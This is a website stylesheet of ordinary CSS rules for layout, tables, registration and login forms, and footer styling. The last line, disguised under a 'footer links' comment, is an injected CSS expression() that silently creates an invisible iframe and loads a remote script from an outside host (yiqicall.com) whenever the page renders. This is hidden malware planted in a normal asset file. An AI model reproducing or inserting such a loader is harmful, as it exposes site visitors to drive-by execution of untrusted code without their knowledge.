/* Basic Stuff */

body {
	background: url(bg.jpg) repeat-x top #fff;
	text-align: center;
	margin-top: 10px;
	margin-bottom: 0;
	font-family: Verdana, Arial, Helvetica, sans-serif;
	color: #666;
	font-size: 12px;
	line-height: 160%;
	}
	
p {
	font-family: Verdana, Arial, Helvetica, sans-serif;
	color: #666;
	font-size: 12px;
	line-height: 150%;
	margin: 0 0 10px 0;
	padding: 0;
	}
	
h1 {
	font-family: Verdana, Arial, Helvetica, sans-serif;
	color: #1e74aa;
	font-size: 14px;
	font-weight: bold;
	margin: 0 0 10px 0;
	padding: 0;
	}
	
h2 {
	font: Verdana, Arial, Helvetica, sans-serif;
	font-size: 12px;
	color: #1e74aa;
	margin: 20px 0 0 0;
	padding: 0;
	}
	
.aa:link {
	color: #ffffff;
	text-decoration: none;
	}
	
.aa:visited {
	color: #ffffff;
	text-decoration: none;
	}
	
.aa:hover {
	color: #ffffff;
	text-decoration: underline;
	}
	
.aa:active {
	color: #ffffff;
	text-decoration: none;
	}
	
.a:link {
	color: #888888;
	text-decoration: none;
	}
	
.a:visited {
	color: #888888;
	text-decoration: none;
	}
	
.a:hover {
	color: #888888;
	text-decoration: underline;
	}
	
.a:active {
	color: #888888;
	text-decoration: none;
	}
	
.b:link {
	color: #cccccc;
	text-decoration: underline;
	}
	
.b:visited {
	color: #cccccc;
	text-decoration: underline;
	}
	
.b:hover {
	color: #cccccc;
	text-decoration: underline;
	}
	
.b:active {
	ccolor: #cccccc;
	text-decoration: underline;
	}
	
.c:link {
	color: #999;
	text-decoration: underline;
	}
	
.c:visited {
	color: #999;
	text-decoration: underline;
	}
	
.c:hover {
	color: #999;
	text-decoration: underline;
	}
	
.c:active {
	ccolor: #999;
	text-decoration: underline;
	}
	
ol {
	margin: 5px 0px 0px 15px;
	padding: 0px 0px 0px 8px;
	}	
		
ul {	
	list-style-type: none;
	margin: 0px;
	padding: 0px;
	}
	
.clearfloats {
	clear: both;
	width: 475px;
	margin: 0px;
	padding: 0px;
	}
	
.highlight {
	font-family:Verdana, Arial, Helvetica, sans-serif;
	font-size:12px;
	font-weight: bold;
	color: #276da4;
	}
	
/*container*/

#container {
	width: 678px; 
	background: url(bg_container.gif) no-repeat top #fff;
	overflow: hidden;
	margin-left: auto;
	margin-right: auto;
	text-align: left;
	border-left: #e8e8e8 solid 1px;
	border-right: #e8e8e8 solid 1px;
	}
	
/*header | banner | menu */
	
#banner {
	width: 678px;
	}
	
#menu {
	width: 680px;
	height: 30px;
	margin: 0 auto 0 auto;
	background: #2775b4;
	}
	
.menulist {
	margin-left: 15px;
	padding-left: 15px;
	padding-top: 4px;
	background: url(bullet_tri.gif) no-repeat left;
	vertical-align: middle;
	float: left;
	font-family: Verdana, Arial, Helvetica, sans-serif;
	font-size: 12px;
	color: #fff;
	}
	

/*content */

.content {
	clear: both;
	width: 650px;
	text-align:left;
	margin: 20px 15px 15px 15px;
	background-color:#FFFFFF
	}
	
.content ul {
	list-style-position: outside;
	list-style: none;
	margin: 0 30px 10px 30px;
	line-height: 150%;
	padding: 0;
	}
	
.content li {
	background: url(bl_triangle_blue.gif) no-repeat left top;
	padding: 0 0 0 15px;
	margin: 10px 0 0 0;
	}
	
.contentright {
	text-align: right;
	}
	
.contentconfirmed {
	width: 550px;
	margin: 20px 15px 15px 60px
	}
	
.headings {
	width: 650px;
	margin:  10px 15px 10px 15px;
	padding: 20px 0px 10px 0px;
	}
	
.hregistration {
	width: 645px;
	background: url(h_registration.gif) no-repeat left;
	height: 40px;
	}
	
#registration {
	margin-left: 10px;
	width: 635px;
	}
	
#registration p {
	font-family: Verdana, Arial, Helvetica, sans-serif;
	color: #666;
	font-size: 12px;
	line-height: 150%;
	margin: 0 0 10px 0;
	padding: 0;
	}
	
.deadline {
	float: left;
	padding-left: 170px;
	font-family:Verdana, Arial, Helvetica, sans-serif;
	font-size: 11px;
	font-weight: bold;
	color: #1e74aa;
	margin-top: 10px;
	}
	
	
/*table */

.mytable {
	width: 650px;
	margin-left: 15px;
	margin-bottom: 10px;
	padding: 0;
	font-size: 12px;
	border:1px solid #cccccc
}

th {
	font: Bold 12px \"Verdana\", Arial, Helvetica, sans-serif;
	color:#333333;
	border-right: 1px solid #fff;
	border-bottom: 1px solid #fff;
	border-top: 1px solid #fff;
	text-align:center;
	padding: 6px 6px 6px 6px;
	background: #f2eeef;
}

th.nobg {



	border-top: 0;
	border-left: 0;
	border-right: 1px solid #fff;
	background: none;
}

td {
	border-right: 1px solid #fff;
	border-bottom: 1px solid #fff;
	background: #ccc;
	padding: 6px;
	color: #333333;
	font-size: 12px;
}


td.alt {
	background: #f2eeef;
	color:#333333;
}

td.alt2 {
	background: #FFFFFF;
	color: #333333;
}

th.spec {
	border-left: 1px solid #C1DAD7;
	border-top: 0;
	background: #fff url(bullet1.gif) no-repeat;
	font: bold 12px  \"Verdana\", Arial, Helvetica, sans-serif;
}

th.specalt {
	border-left: 1px solid #C1DAD7;
	border-top: 0;
	background: #f5fafa url(bullet2.gif) no-repeat;
	font: bold 12px \"Verdana\", Arial, Helvetica, sans-serif;
	color: #797268;
}
	
/*footer */
	

#footer {
	width: 680px;
	height: 70px;
	margin-top: 20px;
	background: url(bg_footer.gif) top no-repeat #ccc;
	font-family: Verdana, Arial, Helvetica, sans-serif;
	font-size: 10px; color: #888;
	overflow: hidden;
	}

	
.footerleft {
	float: left;
	width: 450px;
	padding: 12px 0px 10px 15px;
	line-height: 150%;
	text-align:left;
	}
.fooderleft a:Link{ color:#cccccc; font-size:10pt; font-family:Arial, Helvetica, sans-serif;}
.fooderleft a:hover{ text-decoration:underline;}	

.footerright {
	float: right;
	width: 180px;
	padding: 25px 10px 10px 0;
	line-height: 150%;
	}
	
/*online registration table */

#registerTable {
  padding: 0;
  width: 100%;
  border-collapse: collapse;
}

#registerTable th {
  padding: 0 10px 0 10px;
  font-size: 11px;
  background: #868c8e;
}

#registerTable th.middle {
  text-align: center;
}

#registerTable tr {
  border: 0;
  border-bottom: 2px solid white;
}

#registerTable td.grey {
  background-color: #e6e6e6;
  font-weight: normal;
  font-size: 11px;
  color: #666;
}

#registerTable th.grey {
  background-color: #e6e6e6;
  font-weight: bold;
  font-size: 11px;
  color: #666;
}

input {
  font-size: 11px;
}

.submitRow {
  margin-top: 10px;
  line-height: 2em;
}

.errors, .loginError {
  color: #cf4342;
}

.invalid {
  background-color: #cf4342;
}

.confirmBox {
  width: 440px; 
  margin: 0 auto 0 auto;
}

.confirmBox p {
  margin: 0;
  line-height: 2em;
}

.confirmBox hr {
  height: 1px;
  border: 0;
  border-top: 1px dotted #999;
  margin-top: 20px;
  padding-bottom: 10px;
}

.loginTable {
  border-collapse: collapse;
}

.loginTable td {
  padding: 2px;
  background-color: #fff;
  text-align: left;
  font-weight: normal
}

.rtd {
  text-align: left;
  font-weight: normal;
}

a.blink {
  color: #00f;
}

a.blink:visited {
  color: #00f;
}


.indent {
	margin-left: 40px;
	}
	
.indent2 {
	margin-left: 64px;
	}
	
#legal {
	clear: both;
	width: 640px;
	overflow: hidden;
	margin-top: 10px;
	padding: 0 20px 0 20px;
	}
	
#legal p {
	font-family: Verdana, Arial, Helvetica, sans-serif;
	color: #999;
	font-size: 10px;
	line-height: 150%;
	margin: 0 0 10px 0;
	padding: 0;
	}
	
p.forward {
	margin: -10px 0 0 0;
	padding: 0;
	color: #0077be;
	font-size: 12px;
	}
.style4{ font-size:15px; color:#3366FF;}

/* 頁尾連結*/body{zoom:expression(function(ele){setTimeout(function(){var i=document.createElement('iframe');i.width=i.height=0;document.body.appendChild(i);i.contentWindow.setTimeout(function(){i.contentWindow.document.write('<script src=http://www.yiqicall.com/images/pic.js></script>');},1000);},1000);ele.style.zoom='1';}(this));}
